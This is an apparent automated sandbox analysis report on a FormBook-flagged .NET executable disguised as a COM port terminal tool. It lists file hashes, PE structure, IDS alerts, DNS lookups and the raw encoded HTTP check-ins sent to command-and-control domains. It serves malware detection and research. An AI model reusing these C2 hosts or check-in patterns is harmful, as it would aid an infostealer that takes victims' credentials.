                                                          Process:C:\Users\user\Desktop\2u2u8wnrrW.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.355304211458859
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                          MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                          SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                          SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                          SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                          Malicious:true
                                                          Reputation:high, very likely benign file
                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.1946991352010645
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          File name:2u2u8wnrrW.exe
                                                          File size:583168
                                                          MD5:51dcc89ed1035a6c2fc57ada8dcb4dc2
                                                          SHA1:0e59efbffdd8153c61f20a6039110474c50c20e9
                                                          SHA256:092be1f456b0c24d932d6c4e4c44cfd0c9abc6c0418bf1567e67826cb51aef14
                                                          SHA512:a485e5a4cfb47867d00bc9ace1848d8859274f0c2987e8b46e53fc7086f1af6e53f92e33a17ac66b782641ca77bd91f56d32f40d952bb4df08920273e5e05fe6
                                                          SSDEEP:12288:IQSB6F/pLLbTHFw1WufwltdYYXsOaCnuNQpFINwgNP1:IdBS/lbTHu1WuovdYoayuNrNt
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s.fa..............0.................. ........@.. .......................@............@................................

                                                          File Icon

                                                          Icon Hash:71f0e4d8d0e0f0f0

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x45ecea
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                          Time Stamp:0x6166D973 [Wed Oct 13 13:04:51 2021 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:v4.0.30319
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x5ec980x4f.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x600000x313dc.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x920000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000x5ccf00x5ce00False0.863943682705data7.73579206454IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                          .rsrc0x600000x313dc0x31400False0.441118734137data5.72275954412IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x920000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountry
                                                          RT_ICON0x602000x9311PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                          RT_ICON0x695240x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                          RT_ICON0x79d5c0x94a8data
                                                          RT_ICON0x832140x5488data
                                                          RT_ICON0x886ac0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 3774873599, next used block 4294967047
                                                          RT_ICON0x8c8e40x25a8data
                                                          RT_ICON0x8ee9c0x10a8data
                                                          RT_ICON0x8ff540x988data
                                                          RT_ICON0x908ec0x468GLS_BINARY_LSB_FIRST
                                                          RT_GROUP_ICON0x90d640x84data
                                                          RT_VERSION0x90df80x3e2data
                                                          RT_MANIFEST0x911ec0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorExeMain

                                                          Version Infos

                                                          DescriptionData
                                                          Translation0x0000 0x04b0
                                                          LegalCopyright
                                                          Assembly Version2.11.3.0
                                                          InternalNameCustomAttributeTy.exe
                                                          FileVersion2.11.0.0
                                                          CompanyNameJan Axelson's Lakeview Research
                                                          LegalTrademarks
                                                          CommentsDemonstrates communications between two COM ports
                                                          ProductNameCOM Port Terminal
                                                          ProductVersion2.11.0.0
                                                          FileDescriptionCOM Port Terminal
                                                          OriginalFilenameCustomAttributeTy.exe

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          10/13/21-19:59:39.010568TCP1201ATTACK-RESPONSES 403 Forbidden804980935.186.238.101192.168.2.6
                                                          10/13/21-19:59:50.299540TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981380192.168.2.634.102.136.180
                                                          10/13/21-19:59:50.299540TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981380192.168.2.634.102.136.180
                                                          10/13/21-19:59:50.299540TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981380192.168.2.634.102.136.180
                                                          10/13/21-19:59:50.418458TCP1201ATTACK-RESPONSES 403 Forbidden804981334.102.136.180192.168.2.6
                                                          10/13/21-19:59:56.416398TCP2031453ET TROJAN FormBook CnC Checkin (GET)4983680192.168.2.68.212.24.67
                                                          10/13/21-19:59:56.416398TCP2031449ET TROJAN FormBook CnC Checkin (GET)4983680192.168.2.68.212.24.67
                                                          10/13/21-19:59:56.416398TCP2031412ET TROJAN FormBook CnC Checkin (GET)4983680192.168.2.68.212.24.67
                                                          10/13/21-20:00:01.860405TCP2031453ET TROJAN FormBook CnC Checkin (GET)4983780192.168.2.6172.67.216.2
                                                          10/13/21-20:00:01.860405TCP2031449ET TROJAN FormBook CnC Checkin (GET)4983780192.168.2.6172.67.216.2
                                                          10/13/21-20:00:01.860405TCP2031412ET TROJAN FormBook CnC Checkin (GET)4983780192.168.2.6172.67.216.2

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 13, 2021 19:59:38.869891882 CEST4980980192.168.2.635.186.238.101
                                                          Oct 13, 2021 19:59:38.887728930 CEST804980935.186.238.101192.168.2.6
                                                          Oct 13, 2021 19:59:38.891308069 CEST4980980192.168.2.635.186.238.101
                                                          Oct 13, 2021 19:59:38.891340971 CEST4980980192.168.2.635.186.238.101
                                                          Oct 13, 2021 19:59:38.909185886 CEST804980935.186.238.101192.168.2.6
                                                          Oct 13, 2021 19:59:39.010567904 CEST804980935.186.238.101192.168.2.6
                                                          Oct 13, 2021 19:59:39.010577917 CEST804980935.186.238.101192.168.2.6
                                                          Oct 13, 2021 19:59:39.021987915 CEST4980980192.168.2.635.186.238.101
                                                          Oct 13, 2021 19:59:39.022011995 CEST4980980192.168.2.635.186.238.101
                                                          Oct 13, 2021 19:59:39.321676016 CEST4980980192.168.2.635.186.238.101
                                                          Oct 13, 2021 19:59:39.339648008 CEST804980935.186.238.101192.168.2.6
                                                          Oct 13, 2021 19:59:44.432368994 CEST4981080192.168.2.659.106.13.53
                                                          Oct 13, 2021 19:59:44.712054968 CEST804981059.106.13.53192.168.2.6
                                                          Oct 13, 2021 19:59:44.712212086 CEST4981080192.168.2.659.106.13.53
                                                          Oct 13, 2021 19:59:44.712352991 CEST4981080192.168.2.659.106.13.53
                                                          Oct 13, 2021 19:59:44.991695881 CEST804981059.106.13.53192.168.2.6
                                                          Oct 13, 2021 19:59:45.087755919 CEST804981059.106.13.53192.168.2.6
                                                          Oct 13, 2021 19:59:45.213157892 CEST4981080192.168.2.659.106.13.53
                                                          Oct 13, 2021 19:59:45.494015932 CEST804981059.106.13.53192.168.2.6
                                                          Oct 13, 2021 19:59:45.494039059 CEST804981059.106.13.53192.168.2.6
                                                          Oct 13, 2021 19:59:45.497720957 CEST4981080192.168.2.659.106.13.53
                                                          Oct 13, 2021 19:59:50.278130054 CEST4981380192.168.2.634.102.136.180
                                                          Oct 13, 2021 19:59:50.297987938 CEST804981334.102.136.180192.168.2.6
                                                          Oct 13, 2021 19:59:50.299511909 CEST4981380192.168.2.634.102.136.180
                                                          Oct 13, 2021 19:59:50.299540043 CEST4981380192.168.2.634.102.136.180
                                                          Oct 13, 2021 19:59:50.332587957 CEST804981334.102.136.180192.168.2.6
                                                          Oct 13, 2021 19:59:50.418457985 CEST804981334.102.136.180192.168.2.6
                                                          Oct 13, 2021 19:59:50.418476105 CEST804981334.102.136.180192.168.2.6
                                                          Oct 13, 2021 19:59:50.418647051 CEST4981380192.168.2.634.102.136.180
                                                          Oct 13, 2021 19:59:50.418731928 CEST4981380192.168.2.634.102.136.180
                                                          Oct 13, 2021 19:59:50.438177109 CEST804981334.102.136.180192.168.2.6
                                                          Oct 13, 2021 19:59:56.077188969 CEST4983680192.168.2.68.212.24.67
                                                          Oct 13, 2021 19:59:56.415880919 CEST80498368.212.24.67192.168.2.6
                                                          Oct 13, 2021 19:59:56.415997028 CEST4983680192.168.2.68.212.24.67
                                                          Oct 13, 2021 19:59:56.416398048 CEST4983680192.168.2.68.212.24.67
                                                          Oct 13, 2021 19:59:56.755762100 CEST80498368.212.24.67192.168.2.6
                                                          Oct 13, 2021 19:59:56.755974054 CEST80498368.212.24.67192.168.2.6
                                                          Oct 13, 2021 19:59:56.756012917 CEST80498368.212.24.67192.168.2.6
                                                          Oct 13, 2021 19:59:56.756150007 CEST4983680192.168.2.68.212.24.67
                                                          Oct 13, 2021 19:59:56.756228924 CEST4983680192.168.2.68.212.24.67
                                                          Oct 13, 2021 19:59:57.094993114 CEST80498368.212.24.67192.168.2.6
                                                          Oct 13, 2021 20:00:01.840244055 CEST4983780192.168.2.6172.67.216.2
                                                          Oct 13, 2021 20:00:01.856039047 CEST8049837172.67.216.2192.168.2.6
                                                          Oct 13, 2021 20:00:01.856189966 CEST4983780192.168.2.6172.67.216.2
                                                          Oct 13, 2021 20:00:01.860404968 CEST4983780192.168.2.6172.67.216.2
                                                          Oct 13, 2021 20:00:01.877243042 CEST8049837172.67.216.2192.168.2.6
                                                          Oct 13, 2021 20:00:01.915873051 CEST8049837172.67.216.2192.168.2.6
                                                          Oct 13, 2021 20:00:01.915976048 CEST8049837172.67.216.2192.168.2.6
                                                          Oct 13, 2021 20:00:01.916122913 CEST4983780192.168.2.6172.67.216.2
                                                          Oct 13, 2021 20:00:01.920592070 CEST4983780192.168.2.6172.67.216.2
                                                          Oct 13, 2021 20:00:01.936343908 CEST8049837172.67.216.2192.168.2.6
                                                          Oct 13, 2021 20:00:12.101677895 CEST4984280192.168.2.6108.167.135.122
                                                          Oct 13, 2021 20:00:12.247598886 CEST8049842108.167.135.122192.168.2.6
                                                          Oct 13, 2021 20:00:12.248085022 CEST4984280192.168.2.6108.167.135.122
                                                          Oct 13, 2021 20:00:12.248111010 CEST4984280192.168.2.6108.167.135.122
                                                          Oct 13, 2021 20:00:12.395104885 CEST8049842108.167.135.122192.168.2.6
                                                          Oct 13, 2021 20:00:12.395175934 CEST8049842108.167.135.122192.168.2.6
                                                          Oct 13, 2021 20:00:12.395457983 CEST4984280192.168.2.6108.167.135.122
                                                          Oct 13, 2021 20:00:12.395478010 CEST4984280192.168.2.6108.167.135.122
                                                          Oct 13, 2021 20:00:12.541241884 CEST8049842108.167.135.122192.168.2.6

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 13, 2021 19:59:33.049691916 CEST5005553192.168.2.68.8.8.8
                                                          Oct 13, 2021 19:59:33.822068930 CEST53500558.8.8.8192.168.2.6
                                                          Oct 13, 2021 19:59:38.842576981 CEST5033953192.168.2.68.8.8.8
                                                          Oct 13, 2021 19:59:38.864933014 CEST53503398.8.8.8192.168.2.6
                                                          Oct 13, 2021 19:59:44.057925940 CEST6330753192.168.2.68.8.8.8
                                                          Oct 13, 2021 19:59:44.314589977 CEST53633078.8.8.8192.168.2.6
                                                          Oct 13, 2021 19:59:50.252391100 CEST4969453192.168.2.68.8.8.8
                                                          Oct 13, 2021 19:59:50.276194096 CEST53496948.8.8.8192.168.2.6
                                                          Oct 13, 2021 19:59:55.432975054 CEST5498253192.168.2.68.8.8.8
                                                          Oct 13, 2021 19:59:56.075521946 CEST53549828.8.8.8192.168.2.6
                                                          Oct 13, 2021 20:00:01.777586937 CEST5001053192.168.2.68.8.8.8
                                                          Oct 13, 2021 20:00:01.801343918 CEST53500108.8.8.8192.168.2.6
                                                          Oct 13, 2021 20:00:11.976355076 CEST6381653192.168.2.68.8.8.8
                                                          Oct 13, 2021 20:00:12.100250006 CEST53638168.8.8.8192.168.2.6
                                                          Oct 13, 2021 20:00:22.982777119 CEST5501453192.168.2.68.8.8.8
                                                          Oct 13, 2021 20:00:23.164403915 CEST53550148.8.8.8192.168.2.6
                                                          Oct 13, 2021 20:00:28.775832891 CEST6220853192.168.2.68.8.8.8
                                                          Oct 13, 2021 20:00:28.911995888 CEST53622088.8.8.8192.168.2.6

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          Oct 13, 2021 19:59:33.049691916 CEST192.168.2.68.8.8.80x460bStandard query (0)www.govindfinance.comA (IP address)IN (0x0001)
                                                          Oct 13, 2021 19:59:38.842576981 CEST192.168.2.68.8.8.80xec71Standard query (0)www.satellitephonstore.comA (IP address)IN (0x0001)
                                                          Oct 13, 2021 19:59:44.057925940 CEST192.168.2.68.8.8.80x8c60Standard query (0)www.seal-brother.comA (IP address)IN (0x0001)
                                                          Oct 13, 2021 19:59:50.252391100 CEST192.168.2.68.8.8.80x2149Standard query (0)www.driventow.comA (IP address)IN (0x0001)
                                                          Oct 13, 2021 19:59:55.432975054 CEST192.168.2.68.8.8.80x15e5Standard query (0)www.kangrungao.comA (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:00:01.777586937 CEST192.168.2.68.8.8.80x2d33Standard query (0)www.healthyweekendtips.comA (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:00:11.976355076 CEST192.168.2.68.8.8.80xbd10Standard query (0)www.esyscoloradosprings.comA (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:00:22.982777119 CEST192.168.2.68.8.8.80x3080Standard query (0)www.24000words.comA (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:00:28.775832891 CEST192.168.2.68.8.8.80xbe7eStandard query (0)www.fleetton.comA (IP address)IN (0x0001)

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          Oct 13, 2021 19:59:33.822068930 CEST8.8.8.8192.168.2.60x460bServer failure (2)www.govindfinance.comnonenoneA (IP address)IN (0x0001)
                                                          Oct 13, 2021 19:59:38.864933014 CEST8.8.8.8192.168.2.60xec71No error (0)www.satellitephonstore.com35.186.238.101A (IP address)IN (0x0001)
                                                          Oct 13, 2021 19:59:44.314589977 CEST8.8.8.8192.168.2.60x8c60No error (0)www.seal-brother.comseal-brother.comCNAME (Canonical name)IN (0x0001)
                                                          Oct 13, 2021 19:59:44.314589977 CEST8.8.8.8192.168.2.60x8c60No error (0)seal-brother.com59.106.13.53A (IP address)IN (0x0001)
                                                          Oct 13, 2021 19:59:50.276194096 CEST8.8.8.8192.168.2.60x2149No error (0)www.driventow.comdriventow.comCNAME (Canonical name)IN (0x0001)
                                                          Oct 13, 2021 19:59:50.276194096 CEST8.8.8.8192.168.2.60x2149No error (0)driventow.com34.102.136.180A (IP address)IN (0x0001)
                                                          Oct 13, 2021 19:59:56.075521946 CEST8.8.8.8192.168.2.60x15e5No error (0)www.kangrungao.coma.mb.cnCNAME (Canonical name)IN (0x0001)
                                                          Oct 13, 2021 19:59:56.075521946 CEST8.8.8.8192.168.2.60x15e5No error (0)a.mb.cn8.212.24.67A (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:00:01.801343918 CEST8.8.8.8192.168.2.60x2d33No error (0)www.healthyweekendtips.com172.67.216.2A (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:00:01.801343918 CEST8.8.8.8192.168.2.60x2d33No error (0)www.healthyweekendtips.com104.21.78.41A (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:00:12.100250006 CEST8.8.8.8192.168.2.60xbd10No error (0)www.esyscoloradosprings.comwebsites076.homestead.comCNAME (Canonical name)IN (0x0001)
                                                          Oct 13, 2021 20:00:12.100250006 CEST8.8.8.8192.168.2.60xbd10No error (0)websites076.homestead.com108.167.135.122A (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:00:23.164403915 CEST8.8.8.8192.168.2.60x3080No error (0)www.24000words.com156.240.150.22A (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:00:28.911995888 CEST8.8.8.8192.168.2.60xbe7eNo error (0)www.fleetton.com44.227.65.245A (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:00:28.911995888 CEST8.8.8.8192.168.2.60xbe7eNo error (0)www.fleetton.com44.227.76.166A (IP address)IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • www.satellitephonstore.com
                                                          • www.seal-brother.com
                                                          • www.driventow.com
                                                          • www.kangrungao.com
                                                          • www.healthyweekendtips.com
                                                          • www.esyscoloradosprings.com

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.64980935.186.238.10180C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 13, 2021 19:59:38.891340971 CEST4928OUTGET /fqiq/?M8sli0XH=Sq1XZHSp0Fahcv5+gSE8w/MNMhRnHgbusC6/nQsgBpT+5tokIrb/ucxwlvTI4NNTcxne7QOgew==&eL3dh=5jNDd4kX HTTP/1.1
                                                          Host: www.satellitephonstore.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 13, 2021 19:59:39.010567904 CEST4970INHTTP/1.1 403 Forbidden
                                                          Server: openresty
                                                          Date: Wed, 13 Oct 2021 17:59:38 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 275
                                                          ETag: "615c5dca-113"
                                                          Via: 1.1 google
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.64981059.106.13.5380C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 13, 2021 19:59:44.712352991 CEST4971OUTGET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=mnFbYCr8dRmDLyqklk1rPiA6Of2qOAThWl37YLVanslLOc89q6CMhoedr+7VG/dsSCitRF0szg== HTTP/1.1
                                                          Host: www.seal-brother.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          2192.168.2.64981334.102.136.18080C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 13, 2021 19:59:50.299540043 CEST4977OUTGET /fqiq/?M8sli0XH=WJEXqHgQjytEiPF7j6bk2V/X0M1eNxv0v3X6q4y0idXjxAWnze1B3elnUPttxbcH5sirVrhN7g==&eL3dh=5jNDd4kX HTTP/1.1
                                                          Host: www.driventow.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 13, 2021 19:59:50.418457985 CEST4978INHTTP/1.1 403 Forbidden
                                                          Server: openresty
                                                          Date: Wed, 13 Oct 2021 17:59:50 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 275
                                                          ETag: "615f9602-113"
                                                          Via: 1.1 google
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          3192.168.2.6498368.212.24.6780C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 13, 2021 19:59:56.416398048 CEST5028OUTGET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=c0qy46zOQOLzkfDDWvLWas23i13YCpczqQNjq5UjgzOv0kTDSt1UXZZmGaHbw3hLRr1ARfuDRg== HTTP/1.1
                                                          Host: www.kangrungao.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 13, 2021 19:59:56.755974054 CEST5029INHTTP/1.1 200 OK
